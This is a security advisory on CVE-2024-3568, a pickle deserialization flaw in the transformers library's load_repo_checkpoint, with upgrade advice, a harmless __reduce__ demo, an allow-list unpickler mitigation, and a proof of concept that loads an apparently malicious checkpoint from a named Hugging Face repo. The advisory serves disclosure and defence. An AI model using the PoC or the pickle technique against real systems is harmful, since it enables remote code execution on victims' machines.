Deserialization of Untrusted Data Affecting transformers package, versions [,4.38.0)
- Snyk ID SNYK-PYTHON-TRANSFORMERS-6239525
- published 11 Apr 2024
- disclosed 8 Feb 2024
- credit Patrick Peng
Introduced: 8 Feb 2024
CVE-2024-3568
How to fix?
Upgrade transformers to version 4.38.0 or higher.
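One way to confirm that an environment meets this requirement is to compare the installed version against 4.38.0. The following is a minimal sketch, not part of the advisory: the helper names is_patched and installed_transformers_is_patched are hypothetical, and the parser only looks at the leading numeric components, so a pre-release such as a dev build of 4.38.0 would be treated as patched.

```python
import re
from importlib import metadata

# First fixed release according to this advisory.
FIXED_VERSION = (4, 38, 0)


def is_patched(version_string: str) -> bool:
    """Return True if the leading X.Y[.Z] of version_string is >= 4.38.0.

    Simplification: suffixes such as ".dev0" or "rc1" are ignored.
    """
    match = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version_string)
    if match is None:
        raise ValueError(f"unrecognized version: {version_string!r}")
    # A missing patch component (e.g. "4.40") is treated as 0.
    parts = tuple(int(p) if p is not None else 0 for p in match.groups())
    return parts >= FIXED_VERSION


def installed_transformers_is_patched():
    """Return None if transformers is not installed, else whether it is patched."""
    try:
        return is_patched(metadata.version("transformers"))
    except metadata.PackageNotFoundError:
        return None
```

Calling installed_transformers_is_patched() inside the environment that runs the training code reports on that environment only; other virtual environments or containers need their own check.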
Overview
transformers is a state-of-the-art machine learning library for JAX, PyTorch and TensorFlow.
Affected versions of this package are vulnerable to Deserialization of Untrusted Data via the load_repo_checkpoint function of the TFPreTrainedModel class. The function calls pickle.load on data from potentially untrusted sources, so an attacker who crafts a malicious serialized payload can execute arbitrary code and commands on the targeted machine. Remote code execution follows when a victim is deceived into loading a seemingly harmless checkpoint during a normal training process.
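To illustrate why unpickling untrusted data amounts to code execution, here is a deliberately harmless sketch that is independent of transformers. The class name Payload is hypothetical, and the expression passed to eval stands in for whatever an attacker would choose to run.

```python
import pickle


class Payload:
    """Hypothetical stand-in for an attacker-controlled object."""

    def __reduce__(self):
        # pickle records "call eval('6 * 7')" instead of the object's state.
        # A real attacker would substitute a harmful callable and arguments.
        return (eval, ("6 * 7",))


# What an attacker would publish, e.g. inside a checkpoint file.
malicious_bytes = pickle.dumps(Payload())

# What the victim does: the callable runs during loading, before any
# of the victim's own code gets a chance to inspect the result.
result = pickle.loads(malicious_bytes)
```

After loading, result holds the value computed by eval rather than a Payload instance, which shows that the serialized bytes, not the loading program, decided what code ran.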
Note:
Although the function calls pickle.load(), which permits remote code execution from an untrusted repo, it was essentially deprecated, unused code that is not called in any standard workflow. An attacker would therefore have to induce the user to call this unusual function in addition to preparing a repo with a malicious payload.
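Where code must still read pickled data from a source that is not fully trusted, a common hardening pattern is to restrict which globals the unpickler may resolve, as described in the Python pickle documentation. The sketch below is a generic illustration of that pattern and is not claimed to be the change shipped in transformers 4.38.0. The names ALLOWED_GLOBALS, RestrictedUnpickler, restricted_loads and Payload are hypothetical.

```python
import io
import pickle

# Hypothetical allow-list of (module, name) pairs. Left empty here, so no
# class or function may be resolved while unpickling.
ALLOWED_GLOBALS = set()


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever the pickle stream references a global.
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Unpickle data while refusing every global not on the allow-list."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


class Payload:
    """Harmless stand-in for a malicious object."""

    def __reduce__(self):
        return (eval, ("6 * 7",))


# Plain containers of built-in types need no globals and still load.
plain = restricted_loads(pickle.dumps({"epoch": 3, "step": 1200}))

# The payload references builtins.eval, which the allow-list rejects.
try:
    restricted_loads(pickle.dumps(Payload()))
    blocked = False
except pickle.UnpicklingError:
    blocked = True
```

An allow-list reduces the attack surface but does not make pickle a safe format for untrusted input; avoiding pickle for such data remains the more robust choice.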
PoC
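from transformers import TFAutoModel
from tensorflow.keras.optimizers import Adam

# Load and compile a stock TensorFlow model, as an ordinary training script would.
model = TFAutoModel.from_pretrained('bert-base-uncased')
model.compile(optimizer=Adam(learning_rate=5e-5), loss='sparse_categorical_crossentropy', metrics=['accuracy'])

# Vulnerable call: affected versions (< 4.38.0) pass data from this untrusted repo to pickle.load.
model.load_repo_checkpoint('Retr0REG/EvanModel')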